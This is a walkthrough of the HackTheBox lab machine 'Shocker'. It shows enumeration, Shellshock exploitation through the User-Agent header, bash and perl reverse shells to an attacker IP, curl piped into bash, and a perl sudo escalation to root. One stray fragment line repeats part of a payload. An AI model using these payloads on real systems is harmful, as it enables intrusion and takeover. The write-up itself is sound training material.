Shocker
An easy Linux box from HackTheBox, using shellshock for initial access, and then a misconfigured perl binary for root.
Shocker
Recon
Starting with a general nmap scan
nmap -sC -sV -oA nmap/shocker.nmap 10.10.10.56
With the output
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-09 23:39 EST
Nmap scan report for 10.10.10.56
Host is up (0.020s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan leaks the version number of Ubuntu that the server is running on, OpenSSH 7.2p2 can be tracked to March 17 2017, and you can find that the server is running a version of Ubuntu from that time or earlier
Can also search for Appache versions, and 2.4.18 was for Ubuntu Xenial
Then onto directory enumeration using gobuster
sudo gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/small.txt
WIth output
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/10 00:18:59 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 294]
===============================================================
2022/03/10 00:19:02 Finished
===============================================================
Found a /cgi-bin/ directory, run the dirbust on it with the new directory as URL
When doing directory enumeration, should allow for 403s to be shown, because its likely you can access the files within, but not list them
/cgi-bin/ is usually when Apache gives it over to another scripting language, like scripts stored on the server, bash scripts, perl scrips etc.
So to find these scripts, add the -x tag with .sh,.pl
sudo gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x .sh,.pl
Output
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,pl
[+] Timeout: 10s
===============================================================
2022/03/10 00:28:52 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 119]
===============================================================
2022/03/10 00:28:58 Finished
===============================================================
Found a user.sh script, navigate to it in the browser, and it runs, showing the reply in Burp
Just an uptime test script
00:47:31 up 1:05, 0 users, load average: 0.01, 0.01, 0.00
/cgi-bin/ is a sign that a system could potentially be vulnerable to Shellshock (a bash vulnerability)
Exploitation
To check if nmap has a shellshock detection script
locate nse | grep shellshock
It does have a shellshock script! At /usr/share/nmap/scripts/http-shellshock.nse
It has the sample usage
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
Adapted for Shocker (port 80 and user.sh):
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56
http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
Now we know for sure it is vulnerable to shellshock
We can craft a request that will exploit it
First, capturing a request using Burp to the Shocker web-server, then inserting the shellshock code in the User-Agent header
GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;}; echo; /bin/bash -c whoami
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Returns a 200 with a name of “shelly” as the whoami output
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 06:36:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Connection: close
Content-Type: text/x-sh
Content-Length: 7
shelly
Now send a request using Burp with a reverse shell payload, with nc listening for it on port 9001
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.14.3/9001 0>&1
Now we have a shell on shelly, time for privesc
But first, we make it a real bash shell by using python in the reverse shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
On a seperate terminal, run a simple python server to upload the linux privelege escalator tool (make sure the server is run in the directory with the tool)
python -m http.server 8081
Then curl LinEnum.sh from the reverse shell to the python server, pipe the script into bash
curl 10.10.10.56/LinEnum.sh | bash
Among the huge output, find you can run /usr/bin/perl with sudo with no password
So use perl to get a reverse shell with root access
sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.3";$p=9002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
<n(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
A more elegant solution without a second reverse shell, drops you right into root
sudo /usr/bin/perl -e 'exec("/bin/bash")'
The end :-)